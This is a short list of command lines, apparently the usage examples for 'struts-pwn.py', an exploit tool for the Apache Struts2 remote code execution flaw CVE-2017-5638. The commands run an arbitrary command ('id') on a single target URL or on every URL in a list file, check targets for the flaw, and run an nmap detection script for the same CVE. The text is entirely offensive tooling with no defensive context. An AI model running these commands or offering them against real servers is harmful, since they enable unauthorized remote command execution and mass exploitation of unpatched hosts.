python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
nmap -p <port> --script http-vuln-cve2017-5638 <target>'
python struts-pwn.py --list 'urls.txt' -c 'id'
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'
python struts-pwn.py --check --list 'urls.txt'